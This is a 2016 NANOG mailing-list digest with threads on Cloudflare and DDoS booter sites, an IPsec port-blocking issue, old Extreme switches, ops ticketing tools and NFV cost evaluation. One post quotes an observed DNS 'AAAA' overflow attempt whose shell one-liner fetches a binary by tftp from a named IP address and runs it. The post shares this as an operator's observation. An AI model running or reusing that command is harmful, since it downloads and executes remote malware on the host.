From baldur.norddahl at gmail.com Mon Aug 1 10:20:10 2016
From: baldur.norddahl at gmail.com (Baldur Norddahl)
Date: Mon, 1 Aug 2016 12:20:10 +0200
Subject: Cloudflare, dirty networks and politricks
In-Reply-To:
References: <9578293AE169674F9A048B2BC9A081B401E66668BE@MUNPRDMBXA1.medline.com>
 <20383357-93E7-4B19-B2DF-10FFDAD0F7A2@isprime.com>
 <9578293AE169674F9A048B2BC9A081B401E6666A3B@MUNPRDMBXA1.medline.com>
 <55A34C0A-015C-4353-9C5A-EF78A24182AE@isprime.com>
 <20160728171708.GA87119@e-fensive.net>
 <28E6FC71-F6FF-49B9-B861-3B573372594F@f5.com>
 <20160729120805.GA5869@gsp.org>
 <22427.45091.239632.929005@gargle.gargle.HOWL>
 <69ACB258-40B1-496D-A957-4A3283DC1976@delong.com>
 <22429.328.693730.411532@gargle.gargle.HOWL>
Message-ID: <579F225A.4010307@gmail.com>

On 2016-07-31 05:46, Randy Bush wrote:
>> This is silly. Anyone is of course allowed to deny service to parties
>> involved in obvious criminal activity.
> so block cloudflare from your network and go back to work already.
>
> randy

What is that supposed to accomplish? Cloudflare will still be helping selling DDoS attacks on my network.

No it is not the same as asking Cloudflare to do the sensible thing:

Cloudflare profits on DDoS attacks. We are the victims.

Cloudflare can dump just the obvious criminal customers. The ones they got abuse complaints about so they know which ones to look at.

If we block Cloudflare there will be collateral damage to all legit Cloudflare customers and our own customers using services from legit Cloudflare customers.

Asking me to do anything at all is like telling the rape victim to take care of the problem herself. Cloudflare is the wrongdoing party here, not us.

Blocking Cloudflare does not stop the attacks. If Cloudflare stops offering protection service to booters, those sites will find it very hard to find alternatives. There is a reason they all are using Cloudflare. Thus if Cloudflare boots the booters we will very likely see a decrease in attacks.

My preferred solution is that management of Cloudflare decides to make their company an honest outfit again. Failing that, I would like law enforcement to coerce them into becoming an honest outfit. Failing that, I would want a judge in a civil lawsuit coerce them.

I do believe that most of us on this list have cause to do that civil lawsuit, especially if it was done as a class action. But I just own a small company that is not even based in the US, so I am not going to be the hero that funds it. Instead I will do what I can to warn everyone off this company.

Regards,

Baldur

From randy at psg.com Mon Aug 1 11:33:07 2016
From: randy at psg.com (Randy Bush)
Date: Mon, 01 Aug 2016 20:33:07 +0900
Subject: Cloudflare, dirty networks and politricks
In-Reply-To: <579F225A.4010307@gmail.com>
References: <9578293AE169674F9A048B2BC9A081B401E66668BE@MUNPRDMBXA1.medline.com>
 <20383357-93E7-4B19-B2DF-10FFDAD0F7A2@isprime.com>
 <9578293AE169674F9A048B2BC9A081B401E6666A3B@MUNPRDMBXA1.medline.com>
 <55A34C0A-015C-4353-9C5A-EF78A24182AE@isprime.com>
 <20160728171708.GA87119@e-fensive.net>
 <28E6FC71-F6FF-49B9-B861-3B573372594F@f5.com>
 <20160729120805.GA5869@gsp.org>
 <22427.45091.239632.929005@gargle.gargle.HOWL>
 <69ACB258-40B1-496D-A957-4A3283DC1976@delong.com>
 <22429.328.693730.411532@gargle.gargle.HOWL>
 <579F225A.4010307@gmail.com>
Message-ID:

>> so block cloudflare from your network and go back to work already.
>
> What is that supposed to accomplish? Cloudflare will still be helping
> selling DDoS attacks on my network.
>
> No it is not the same as asking Cloudflare to do the sensible thing:

and how is that working out for you?

all that is happening is the subject that won't die is being a dos on this list (yes, including this response)

randy

From ahebert at pubnix.net Mon Aug 1 13:41:11 2016
From: ahebert at pubnix.net (Alain Hebert)
Date: Mon, 1 Aug 2016 09:41:11 -0400
Subject: Cloudflare, dirty networks and politricks
In-Reply-To:
References: <9578293AE169674F9A048B2BC9A081B401E66668BE@MUNPRDMBXA1.medline.com>
 <20383357-93E7-4B19-B2DF-10FFDAD0F7A2@isprime.com>
 <9578293AE169674F9A048B2BC9A081B401E6666A3B@MUNPRDMBXA1.medline.com>
 <55A34C0A-015C-4353-9C5A-EF78A24182AE@isprime.com>
 <20160728171708.GA87119@e-fensive.net>
 <28E6FC71-F6FF-49B9-B861-3B573372594F@f5.com>
 <20160729120805.GA5869@gsp.org>
 <22427.45091.239632.929005@gargle.gargle.HOWL>
 <69ACB258-40B1-496D-A957-4A3283DC1976@delong.com>
 <22429.328.693730.411532@gargle.gargle.HOWL>
 <579F225A.4010307@gmail.com>
Message-ID: <369747a4-00f9-966a-0893-6f91779e2715@pubnix.net>

While on that subject,

( And by pure coincidence )

Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe) using OVH as a payload distribution

    AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

Obviously that host is not accessible at the moment. (GG OVH?)

I'm suspecting that the CC used to create that VM got declined on the 1st, which is often the case for payload distribution.

-----
Alain Hebert ahebert at pubnix.net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443

On 08/01/16 07:33, Randy Bush wrote:
>>> so block cloudflare from your network and go back to work already.
>> What is that supposed to accomplish? Cloudflare will still be helping
>> selling DDoS attacks on my network.
>>
>> No it is not the same as asking Cloudflare to do the sensible thing:
> and how is that working out for you?
>
> all that is happening is the subject that won't die is being a dos on
> this list (yes, including this response)
>
> randy
>

From Edwin.Mallette at charter.com Mon Aug 1 13:54:03 2016
From: Edwin.Mallette at charter.com (Mallette, Edwin J)
Date: Mon, 1 Aug 2016 13:54:03 +0000
Subject: Brighthouse Orlando Port blocking ISAKMP
Message-ID:

Hi Erik,

We definitely do not filter UDP500 across our network. I'm going to reach out to you directly to see if I can help figure out what's going on.

Cheers!

Ed

On 7/30/16, 11:38 PM, "NANOG on behalf of Eric C. Miller" wrote:

>Hello!
>
>Subject says it all!!! I cannot open any IPSec tunnels, because UDP 500
>is not making it through to my Brighthouse connection. I've tried from
>Level3, Cogent, and AT&T. Are there any Brighthouse engineers on that
>would help me shed some light on this?
>
>Thank you,
>
>Eric

From freedomshield2005 at gmail.com Mon Aug 1 12:10:36 2016
From: freedomshield2005 at gmail.com (John)
Date: Mon, 1 Aug 2016 15:10:36 +0300
Subject: Cloudflare, dirty networks and politricks
Message-ID:

On 2016-08-01 13:20, Baldur Norddahl wrote:
> On 2016-07-31 05:46, Randy Bush wrote:
>>> This is silly. Anyone is of course allowed to deny service to parties
>>> involved in obvious criminal activity.
>> so block cloudflare from your network and go back to work already.
>>
>> randy
....
> I do believe that most of us on this list have cause to do that civil
> lawsuit, especially if it was done as a class action. But I just own a
> small company that is not even based in the US, so I am not going to
> be the hero that funds it. Instead I will do what I can to warn
> everyone off this company.
>
> Regards,
>
> Baldur

I think even you will win in court.

Russian government since a while implemented country-wide blocklist. It is transparent and available online, and there is a lot of cloudflare ip's (http://reestr.rublacklist.net/api/ips).
First i thought, again Putin's regime crack on freedom, but after viewing specific cloudflare subnet as example ( http://reestr.rublacklist.net/search/1?q=104.16.) i can say, major part of websites are online gambling, and many of them have court decisions. There is also some ISIL propaganda, questionable nudes of underage (they pretend to be art), drug dealers forums (all in russian language) and etc.

As far as i know russians send first abuse letter, and if such content is not removed in reasonable terms - they block resource on "russian firewall". And i believe ignorance hurts cloudflare business in Russia, but do they care?

I may understand much more proper position of google, for example if they receive court order from Russia - they block this particular content in Russia only. But they won't back on their position on free speech. And they are able to clearly draw a line between free speech and criminals.

Ok, let's say on booters no court decision and it is gray area. But providing connectivity for terrorists propaganda or very questionable content - beyond my understanding. Sure i leave chance that they didn't receive notification from officials, but at least now they are aware about this.

From nanog at ics-il.net Mon Aug 1 22:39:39 2016
From: nanog at ics-il.net (Mike Hammett)
Date: Mon, 1 Aug 2016 17:39:39 -0500 (CDT)
Subject: ExtremeWare
In-Reply-To: <1238017378.12022.1470091104816.JavaMail.mhammett@ThunderFuck>
Message-ID: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck>

Can those that ran switches with ExtremeWare on them remember that far back?

I've got a Summit 400t-48 and I can't seem to figure out how to get DDM information from the SFP. Did they have that ability?

-----
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com

Midwest-IX
http://www.midwest-ix.com

From paul at prt.org Tue Aug 2 06:17:36 2016
From: paul at prt.org (Paul Thornton)
Date: Tue, 2 Aug 2016 07:17:36 +0100
Subject: ExtremeWare
In-Reply-To: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck>
References: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck>
Message-ID: <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org>

Hi

On 01/08/2016 23:39, Mike Hammett wrote:
> Can those that ran switches with ExtremeWare on them remember that far back?

Just about.

>
> I've got a Summit 400t-48 and I can't seem to figure out how to get DDM information from the SFP. Did they have that ability?

They probably do, but only in the deep runic debug mode (nofeep) which was never a recommended practice unless you had the TAC on the 'phone. I have a couple of old 48si boxes hanging around in the lab LAN - Extremeware 7.8.4 certainly doesn't understand "show port n transceiver". I think this is XOS only.

Paul.

From ryanczak at gmail.com Tue Aug 2 13:59:01 2016
From: ryanczak at gmail.com (Matt Ryanczak)
Date: Tue, 02 Aug 2016 13:59:01 +0000
Subject: Operations task management software?
In-Reply-To: <712E5359-5217-41AA-A779-F13DCE597537@dino.hostasaurus.com>
References: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com>
 <712E5359-5217-41AA-A779-F13DCE597537@dino.hostasaurus.com>
Message-ID:

Jira works well as a task tracking system for ops. Customizable work flows, decent integration with ldap, etc. Also good for tracking software projects. Having both software and ops tasks in one place has many benefits.

On Wed, Jul 27, 2016, 16:28 David Hubbard wrote:

> Full automation is planned but does not eliminate the need for the
> software.
> Zero human auditing of fully automated processes and data
> collection are not acceptable to various certifying entities, the relevant
> auditors, the inevitably involved lawyers, and won't pick up on bad data,
> like a bad thermometer or snmp counter that says a CRAC is 65 degrees when
> it's really 90. So I'm still going to need a management solution to the
> issue whether it's to tell someone to do the work or to tell someone to
> check the automated work.
>
> David
>
> On 7/27/16, 7:19 PM, "Lee" wrote:
>
>     On 7/27/16, David Hubbard wrote:
>     > Hi all, curious if anyone has recommendations on software that helps manage
>     > routine duties assigned to operations staff?
>
>     Have computers do the routine scut work - not people.
>
>     > For example, let's say we have a P&P that says someone from the netops group
>     > must check that Rancid is successfully backing up all router configs
>     > bi-weekly.
>
>     You've got the source code for rancid, so change rancid-run to do something like
>         LOGFILE=$LOGDIR/$GROUP.`date +%Y%m%d.%H%M%S`; export LOGFILE
>     change the
>         ) >$LOGDIR/$GROUP.`date +%Y%m%d.%H%M%S` 2>&1
>     to
>         ) >$LOGFILE 2>&1
>
>     and then in control_rancid do something like
>         grep "clogin error:" $LOGFILE | sort | uniq -c >$TMP.fail
>         if [ -s $TMP.fail ]; then
>             # got some output, mail the report
>             ...
>
>     Do the same type thing for checking on
>     > backup failures, backup internet circuit status, out of band interfaces, etc.
>
>     Automate the checks, put the scripts in crontab & mail out an
>     "OhNoes!" or "all clear" msg at the end. At which point you're left
>     with the problem of making sure the managers are looking at the emails
>     & making sure whatever problems are found actually get fixed :)
>
>     Regards,
>     Lee
>
>
>

From Jeroen.Wunnink at hibernianetworks.com Tue Aug 2 14:07:09 2016
From: Jeroen.Wunnink at hibernianetworks.com (Jeroen Wunnink)
Date: Tue, 2 Aug 2016 14:07:09 +0000
Subject: Operations task management software?
In-Reply-To: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com>
References: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com>
Message-ID: <77561D93-70EF-48B6-A437-ADBBE84D0C9F@hibernianetworks.com>

We use redmine, combined with scripts that call its API to create automated tickets/tasks that NOC or engineers need to attend to.

Has email notifications, wiki, documents, files, code repo, calendar, customisable fields all built in.

--
Jeroen Wunnink
IP Engineering Manager
Hibernia Networks - Amsterdam Office
Main numbers (Ext: 1011): USA +1.908.516.4200 | Canada +1.902.442.1780
Ireland +353.1.867.3600 | UK +44.1704.322.300 | Netherlands +31.208.200.622
24/7/365 IP NOC Phone: +31.20.82.00.623
Jeroen.Wunnink at hibernianetworks.com
www.hibernianetworks.com

On 27/07/16 20:16, "NANOG on behalf of David Hubbard" wrote:

>Hi all, curious if anyone has recommendations on software that helps manage routine duties assigned to operations staff?
>
>For example, let's say we have a P&P that says someone from the netops group must check that Rancid is successfully backing up all router configs bi-weekly. Ideally, it would send an email reminder to this pre-defined group of people saying hey, it's Monday, someone needs to check this and come acknowledge the task as having been completed. If that doesn't occur, pre-defined manager X is notified on Tuesday. If manager X doesn't get someone to complete the task, director Y is notified, so on and so forth. Then, perhaps periodically it emails manager X anyway and says hey, it's been three months, you need to audit netops to ensure they're actually doing the Rancid audit and not just checking that it was done. This could be applied to the staff who check on backup failures, backup internet circuit status, out of band interfaces, etc.
>
>A data center I looked at recently had QR code stickers on all of their infrastructure stuff and there were staff assigned to check and log certain displayed values each day.
>The software would at least ensure they actually visited the equipment by requiring they scan the relevant QR code when in front of it. So I figure something that does what I'm looking for properly already exists.
>
>Thanks,
>
>David
>

This e-mail and any attachments thereto is intended only for use by the addressee(s) named herein and may be proprietary and/or legally privileged. If you are not the intended recipient of this e-mail, you are hereby notified that any dissemination, distribution or copying of this email, and any attachments thereto, without the prior written permission of the sender is strictly prohibited. If you receive this e-mail in error, please immediately telephone or e-mail the sender and permanently delete the original copy and any copy of this e-mail, and any printout thereof. All documents, contracts or agreements referred or attached to this e-mail are SUBJECT TO CONTRACT. The contents of an attachment to this e-mail may contain software viruses that could damage your own computer system. While Hibernia Networks has taken every reasonable precaution to minimize this risk, we cannot accept liability for any damage that you sustain as a result of software viruses. You should carry out your own virus checks before opening any attachment.

From rjacobs at pslightwave.com Tue Aug 2 14:40:36 2016
From: rjacobs at pslightwave.com (Robert Jacobs)
Date: Tue, 2 Aug 2016 14:40:36 +0000
Subject: ExtremeWare
In-Reply-To: <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org>
References: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck>
 <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org>
Message-ID:

Too old.... feature was not supported on that code rev or model.

Robert Jacobs | Network Director/Architect
Direct: 832-615-7742
Main: 832-615-8000
Fax: 713-510-1650
5959 Corporate Dr. Suite 3300; Houston, TX 77036
A Certified Woman-Owned Business
24x7x365 Customer
Support: 832-615-8000 | support at pslightwave.com

This electronic message contains information from Phonoscope Lightwave which may be privileged and confidential. The information is intended to be for the use of individual(s) or entity named above. If you are not the intended recipient, any disclosure, copying, distribution or use of the contents of this information is prohibited. If you have received this electronic message in error, please notify me by telephone or e-mail immediately.

-----Original Message-----
From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Paul Thornton
Sent: Tuesday, August 2, 2016 1:18 AM
To: nanog at nanog.org
Subject: Re: ExtremeWare

Hi

On 01/08/2016 23:39, Mike Hammett wrote:
> Can those that ran switches with ExtremeWare on them remember that far back?

Just about.

>
> I've got a Summit 400t-48 and I can't seem to figure out how to get DDM information from the SFP. Did they have that ability?

They probably do, but only in the deep runic debug mode (nofeep) which was never a recommended practice unless you had the TAC on the 'phone. I have a couple of old 48si boxes hanging around in the lab LAN - Extremeware 7.8.4 certainly doesn't understand "show port n transceiver". I think this is XOS only.

Paul.

From saku at ytti.fi Tue Aug 2 16:31:24 2016
From: saku at ytti.fi (Saku Ytti)
Date: Tue, 2 Aug 2016 19:31:24 +0300
Subject: Operations task management software?
In-Reply-To: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com>
References: <51622BA9-0A59-4E0C-B5CB-518D53015D33@dino.hostasaurus.com>
Message-ID:

On 27 July 2016 at 21:16, David Hubbard wrote:

Hey,

> Hi all, curious if anyone has recommendations on software that helps manage routine duties assigned to operations staff?

I'd solicit opinions as well.
There are few features I'd like to see:

1) ability to create parent+child, if all children are closed, parent closes; if parent is closed, children close
2) ability to create dependencies, perhaps I have some design change I want to make, but it can't be done until large bunch of operational work is done, I could create tickets for ops, and then create ticket for myself, and make it depend on the ops ticket being solved. It wouldn't be seen in my work queue, until all solve-dependencies are solved.
3) user (non-admin) access to API, if the UI is bad, like it probably is for my very small subnet of things I need, I could create own CLI UI addressing solely the use cases that are relevant to me, in a streamlined, low-time-cost UI to me. In dream scenario shipping webUI is dog-fooding documented API, so anything I can do there, I can do from my own CLI UI.

There are probably others, but those are the main things I think I need.

--
++ytti

From ahebert at pubnix.net Tue Aug 2 18:08:29 2016
From: ahebert at pubnix.net (Alain Hebert)
Date: Tue, 2 Aug 2016 14:08:29 -0400
Subject: ExtremeWare
In-Reply-To: <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org>
References: <1508035138.12027.1470091176378.JavaMail.mhammett@ThunderFuck>
 <9f487247-3406-dd0c-f7d2-acf2ac57dd75@prt.org>
Message-ID:

Hey,

Those are still current here =D

But yes 12.x or 15.x XOS has support, but only for official EN optics.

-----
Alain Hebert ahebert at pubnix.net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443

On 08/02/16 02:17, Paul Thornton wrote:
> Hi
>
> On 01/08/2016 23:39, Mike Hammett wrote:
>> Can those that ran switches with ExtremeWare on them remember that
>> far back?
>
> Just about.
>>
>> I've got a Summit 400t-48 and I can't seem to figure out how to get DDM
>> information from the SFP. Did they have that ability?
> They probably do, but only in the deep runic debug mode (nofeep) which
> was never a recommended practice unless you had the TAC on the
> 'phone. I have a couple of old 48si boxes hanging around in the lab
> LAN - Extremeware 7.8.4 certainly doesn't understand "show port n
> transceiver". I think this is XOS only.
>
> Paul.
>
>

From dmburgess at linktechs.net Tue Aug 2 19:24:51 2016
From: dmburgess at linktechs.net (Dennis Burgess)
Date: Tue, 2 Aug 2016 19:24:51 +0000
Subject: CenturyLink Executive
Message-ID:

I have been working on a circuit outage since Monday morning, my tickets are closed, can't get ahold of anyone, no phone calls, problem not resolved, anyone from CenturyLink Executive Team could give me a call or e-mail to see if we can get these issues solved.

[DennisBurgessSignature]
www.linktechs.net - 314-735-0270 x103 - dmburgess at linktechs.net

From dhubbard at dino.hostasaurus.com Tue Aug 2 20:47:35 2016
From: dhubbard at dino.hostasaurus.com (David Hubbard)
Date: Tue, 2 Aug 2016 20:47:35 +0000
Subject: Level3 (3356) to outlook.office365.com via v6?
Message-ID: <126DF965-80A0-443C-869E-AF70DB14EC11@dino.hostasaurus.com>

Curious if anyone else is having issues reaching outlook.office365.com via ipv6 over Level 3? Our customers have begun reporting failures checking email, and in the ones who have had this issue, are using the mail server name outlook.office365.com and are on v6. Traceroute6 shows the traffic dying shortly into Level 3 land at 2001:1900:4:1::3d1 which is likely a Tampa-area router.

Thanks,

David

From Sam at SanDiegoBroadband.com Tue Aug 2 22:01:32 2016
From: Sam at SanDiegoBroadband.com (Sam Norris)
Date: Tue, 2 Aug 2016 15:01:32 -0700
Subject: Level3 (3356) to outlook.office365.com via v6?
In-Reply-To: <126DF965-80A0-443C-869E-AF70DB14EC11@dino.hostasaurus.com>
References: <126DF965-80A0-443C-869E-AF70DB14EC11@dino.hostasaurus.com>
Message-ID: <0cd601d1ed09$6fbc8750$4f3595f0$@SanDiegoBroadband.com>

We have 2 customers complaining about this in the past 3 days - both using IPv4 only. Glad to see this because maybe it's a larger problem outside of our network.

Sam

> -----Original Message-----
> From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of David Hubbard
> Sent: Tuesday, August 02, 2016 1:48 PM
> To: nanog at nanog.org
> Subject: Level3 (3356) to outlook.office365.com via v6?
>
> Curious if anyone else is having issues reaching outlook.office365.com via ipv6
> over Level 3? Our customers have begun reporting failures checking email, and in
> the ones who have had this issue, are using the mail server name
> outlook.office365.com and are on v6. Traceroute6 shows the traffic dying shortly
> into Level 3 land at 2001:1900:4:1::3d1 which is likely a Tampa-area router.
>
> Thanks,
>
> David
>
>

---
This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus

From matt at kahlerlarson.org Wed Aug 3 01:21:28 2016
From: matt at kahlerlarson.org (Matt Larson)
Date: Tue, 2 Aug 2016 19:21:28 -0600
Subject: Verizon Wireless contact
Message-ID:

Could someone from Verizon Wireless please contact me off-list?

Thanks,
Matt

--
Matt Larson
VP of Research
Office of the CTO, ICANN
+1 240 459-9562 (mobile)

From mel at beckman.org Wed Aug 3 01:28:08 2016
From: mel at beckman.org (Mel Beckman)
Date: Wed, 3 Aug 2016 01:28:08 +0000
Subject: Frontier FlashWave Support contact
Message-ID: <71222311-1060-41A7-8CD6-2D0FFE4EAF18@beckman.org>

Can someone from Frontier provide a CO contact for customer-prem FlashWave units? We have several in alarm, although otherwise functional, but Frontier front line support seems unable to open tickets on this gear, since it's not apparently considered CPE by Frontier.

-mel beckman

From karim.adel at gmail.com Wed Aug 3 01:50:16 2016
From: karim.adel at gmail.com (Kasper Adel)
Date: Tue, 2 Aug 2016 18:50:16 -0700
Subject: NFV Solution Evaluation Methodology
Message-ID:

Hi,

I am interested in hearing the approach and thought-process that senior people on NANOG are following when presented with an NFV solution. Assuming that the exercise at hand is to consider NFV for future expansions of Firewalls and L3VPNs or stay with the existing model of what is called PNF (physical network function)...i.e : classic routers and FWs.

There are a lot of factors to consider and Vendors will typically give their biased opinion, so i'm trying to get my head out of their game, to be able to think agnostically about the whole thing.

1) Product and Service/Support Cost.
2) Operation Complexity/Learning Curve. (open source products included).
3) X Factors (Those that are never listed but do bite in the back) : Quality, Integration with Classic, Migration, Usability...etc

The main goal behind us exploring NFV is the promised cost-saving, so a good method to be able to do the math of whether NFV will save opex/capex or NOT is definitely needed here and i'm trying to gather guidelines from the list.

I think it's easier to keep this post high-level, and later dig deeper.

Cheers,
K

From cb.list6 at gmail.com Wed Aug 3 02:08:15 2016
From: cb.list6 at gmail.com (Ca By)
Date: Tue, 2 Aug 2016 19:08:15 -0700
Subject: NFV Solution Evaluation Methodology
In-Reply-To:
References:
Message-ID:

On Tuesday, August 2, 2016, Kasper Adel wrote:

> Hi,
>
> I am interested in hearing the approach and thought-process that senior
> people on NANOG are following when presented with an NFV solution. Assuming
> that the exercise at hand is to consider NFV for future expansions of
> Firewalls and L3VPNs or stay with the existing model of what is called PNF
> (physical network function)...i.e : classic routers and FWs.
>
> There are a lot of factors to consider and Vendors will typically give
> their biased opinion, so i'm trying to get my head out of their game, to be
> able to think agnostically about the whole thing.
>
> 1) Product and Service/Support Cost.
> 2) Operation Complexity/Learning Curve. (open source products included).
> 3) X Factors (Those that are never listed but do bite in the back) :
> Quality, Integration with Classic, Migration, Usability...etc
>
> The main goal behind us exploring NFV is the promised cost-saving, so a
> good method to be able to do the math of whether NFV will save opex/capex
> or NOT is definitely needed here and i'm trying to gather guidelines from
> the list.
>
> I think it's easier to keep this post high-level, and later dig deeper.
>
> Cheers,
> K
>

Sorry, just a junior person here. Maybe a sr can pipe up later.

But my business cases and associated data points show NFV like SDN are snake oil.

If you know your requirements, buy / implement the best value solution. You can call it NFV if that makes you feel better.

There is nothing new under the sun. Running DNS or bgp on linux cough... is not a new thing.

If you are google or fb and have the best software engineers in the world, you can express your requirements to your dev team and they can just build it. And support it.

But i see a lot of folks paying premium for sdn/nfv and tooting their own horns ... but the needle is not moving

Buyer beware. Ymmv.

CB

Ps. Also, simpler > complex. Lots of $ in this statement.

From eric.kuhnke at gmail.com Wed Aug 3 02:16:04 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Tue, 2 Aug 2016 19:16:04 -0700
Subject: NFV Solution Evaluation Methodology
In-Reply-To:
References:
Message-ID:

But but but... cloud! THE CLOUD! Cloudy clouds fluffy white flying through the air, you should move everything to the Cloud (tm).

Sometimes people forget that *somebody* needs to run the bare metal and OSI layer 1 things that physically make up the cloud.

On Tue, Aug 2, 2016 at 7:08 PM, Ca By wrote:

> On Tuesday, August 2, 2016, Kasper Adel wrote:
>
> > Hi,
> >
> > I am interested in hearing the approach and thought-process that senior
> > people on NANOG are following when presented with an NFV solution. Assuming
> > that the exercise at hand is to consider NFV for future expansions of
> > Firewalls and L3VPNs or stay with the existing model of what is called PNF
> > (physical network function)...i.e : classic routers and FWs.
> >
> > There are a lot of factors to consider and Vendors will typically give
> > their biased opinion, so i'm trying to get my head out of their game, to be
> > able to think agnostically about the whole thing.
> >
> > 1) Product and Service/Support Cost.
> > 2) Operation Complexity/Learning Curve. (open source products included).
> > 3) X Factors (Those that are never listed but do bite in the back) :
> > Quality, Integration with Classic, Migration, Usability...etc
> >
> > The main goal behind us exploring NFV is the promised cost-saving, so a
> > good method to be able to do the math of whether NFV will save opex/capex
> > or NOT is definitely needed here and i'm trying to gather guidelines from
> > the list.
> >
> > I think it's easier to keep this post high-level, and later dig deeper.
> >
> > Cheers,
> > K
> >
>
> Sorry, just a junior person here. Maybe a sr can pipe up later.
>
> But my business cases and associated data points show NFV like SDN
> are snake oil.
>
> If you know your requirements, buy / implement the best value solution. You
> can call it NFV if that makes you feel better.
>
> There is nothing new under the sun. Running DNS or bgp on linux cough... is
> not a new thing.
>
> If you are google or fb and have the best software engineers in the world,
> you can express your requirements to your dev team and they can just build
> it. And support it.
>
> But i see a lot of folks paying premium for sdn/nfv and tooting their own
> horns ...
> but the needle is not moving
>
> Buyer beware. Ymmv.
>
> CB
>
> Ps. Also, simpler > complex. Lots of $ in this statement.
>

From morrowc.lists at gmail.com Wed Aug 3 03:07:42 2016
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Tue, 2 Aug 2016 23:07:42 -0400
Subject: NFV Solution Evaluation Methodology
In-Reply-To:
References:
Message-ID:

On Tue, Aug 2, 2016 at 10:16 PM, Eric Kuhnke wrote:

> But but but... cloud! THE CLOUD! Cloudy clouds fluffy white flying
> through the air, you should move everything to the Cloud (tm).
>
> Sometimes people forget that *somebody* needs to run the bare metal and OSI
> layer 1 things that physically make up the cloud.
>
>

mr by isn't wrong there are lots of ... over sold things.

but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built appliance garbage that can't scale in a cost effective manner and replacing it with some software solution on 'many' commodity unix-like-hosts that can scale horizontally.

-chris
(just a chemical engineer... really)

From Valdis.Kletnieks at vt.edu Wed Aug 3 03:15:44 2016
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 02 Aug 2016 23:15:44 -0400
Subject: NFV Solution Evaluation Methodology
In-Reply-To:
References:
Message-ID: <194341.1470194144@turing-police.cc.vt.edu>

On Tue, 02 Aug 2016 19:16:04 -0700, Eric Kuhnke said:
> But but but... cloud! THE CLOUD! Cloudy clouds fluffy white flying
> through the air, you should move everything to the Cloud (tm).

Running the stuff you need to keep your own network running on the cloud?

That's the sort of thing I encourage my competitors to do. :)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 848 bytes
Desc: not available
URL:

From thegameiam at yahoo.com Wed Aug 3 03:28:10 2016
From: thegameiam at yahoo.com (David Barak)
Date: Tue, 2 Aug 2016 20:28:10 -0700
Subject: NFV Solution Evaluation Methodology
In-Reply-To:
References:
Message-ID:

Simpler > complex *sometimes*. It turns out that sometimes the complexity is worth it (eg https://youtu.be/-iiXsbrEv3U ).

Perhaps "as simple as possible, but no simpler" would be reasonable?

David Barak
Sent from mobile device, please excuse autocorrection artifacts

> On Aug 2, 2016, at 7:08 PM, Ca By wrote
> CB
>
> Ps. Also, simpler > complex. Lots of $ in this statement.

From eric at ericheather.com Wed Aug 3 03:38:39 2016
From: eric at ericheather.com (Eric C. Miller)
Date: Wed, 3 Aug 2016 03:38:39 +0000
Subject: Brighthouse Orlando Port blocking ISAKMP
In-Reply-To:
References:
Message-ID:

All is well, now. It appears that it may have been on XO's network. My crypto tunnel between AT&T and BH crossed XO, and asymmetric routing from my office network had Cogent and XO outgoing, and Level3 on the return. If I forced my office connection to use Level3 for the outbound, the tunnel established immediately.

Brighthouse's phone support was a grade F, by the way. Their phone support had me yanked around for an hour, before they finally consulted with Tier3. After relaying the response, which was simply, "BH doesn't filter customer traffic - It must be on your side," I asked to speak with them directly. The person I was speaking to proceeded to tell me that Tier-3 had just closed, and that they would have to call me back. It was 48 hours before I received a call back. Grr.

Eric Miller, CCNP Network Engineering Consultant -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mallette, Edwin J Sent: Monday, August 1, 2016 9:54 AM To: NANOG Subject: Re: Brighthouse Orlando Port blocking ISAKMP Hi Erik, We definitely do not filter UDP500 across our network. I'm going to reach out to you directly to see if I can help figure out what's going on. Cheers! Ed On 7/30/16, 11:38 PM, "NANOG on behalf of Eric C. Miller" wrote: >Hello! > >Subject says it all!!! I cannot open any IPSec tunnels, because UDP 500 >is not making it through to my Brighthouse connection. I've tried from >Level3, Cogent, and AT&T. Are there any Brighthouse engineers on that >would help me shed some light on this? > >Thank you, > >Eric From mel at beckman.org Wed Aug 3 04:40:16 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 3 Aug 2016 04:40:16 +0000 Subject: Frontier FlashWave Support contact In-Reply-To: <71222311-1060-41A7-8CD6-2D0FFE4EAF18@beckman.org> References: <71222311-1060-41A7-8CD6-2D0FFE4EAF18@beckman.org> Message-ID: Thank you Frontier for the very rapid out-of-band contact! -mel beckman > On Aug 2, 2016, at 6:28 PM, Mel Beckman wrote: > > Can someone from Frontier provide a CO contact for customer-prem FlashWave units? We have several in alarm, although otherwise functional, but Frontier front line support seems unable to open tickets on this gear, since it's not apparently considered CPE by Frontier. > > -mel beckman From randy at psg.com Wed Aug 3 07:56:34 2016 From: randy at psg.com (Randy Bush) Date: Wed, 03 Aug 2016 16:56:34 +0900 Subject: NFV Solution Evaluation Methodology 